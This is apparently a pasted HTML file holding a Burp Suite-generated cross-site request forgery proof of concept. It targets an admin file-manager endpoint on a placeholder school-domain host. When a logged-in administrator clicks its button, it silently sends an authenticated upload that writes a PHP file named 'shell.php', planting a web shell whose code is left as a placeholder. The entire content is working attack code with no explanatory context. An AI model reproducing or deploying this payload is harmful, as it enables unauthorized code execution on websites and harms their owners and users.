saaaaaaaaaad

1. <html>
2. <!-- CSRF PoC - generated by Burp Suite Professional -->
3. <body>
4. <script>history.pushState('', '', '/')</script>
5. <script>
6. function submitRequest()
7. {
8. var xhr = new XMLHttpRequest();
9. xhr.open("POST", "http:\/\/urTarget.sch.id\/admin\/ifm.php", true);
10. xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
11. xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary7J7LuNS5DSwhqr0Q");
12. xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,id;q=0.8");
13. xhr.withCredentials = true;
14. var body = "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
15. "Content-Disposition: form-data; name=\"api\"\r\n" +
16. "\r\n" +
17. "upload\r\n" +
18. "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
19. "Content-Disposition: form-data; name=\"dir\"\r\n" +
20. "\r\n" +
21. "\r\n" +
22. "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
23. "Content-Disposition: form-data; name=\"file\"; filename=\"shell.txt\"\r\n" +
24. "Content-Type: text/plain\r\n" +
25. "\r\n" +
26. "<?php $code= urCodeShell; echo $code;?>\r\n" +
27. "\r\n" +
28. "------WebKitFormBoundary7J7LuNS5DSwhqr0Q\r\n" +
29. "Content-Disposition: form-data; name=\"newfilename\"\r\n" +
30. "\r\n" +
31. "shell.php\r\n" +
32. "------WebKitFormBoundary7J7LuNS5DSwhqr0Q--\r\n";
33. var aBody = new Uint8Array(body.length);
34. for (var i = 0; i < aBody.length; i++)
35. aBody[i] = body.charCodeAt(i);
36. xhr.send(new Blob([aBody]));
37. }
38. </script>
39. <form action="#">
40. <input type="button" value="Submit request" onclick="submitRequest();" />
41. </form>
42. </body>
43. </html>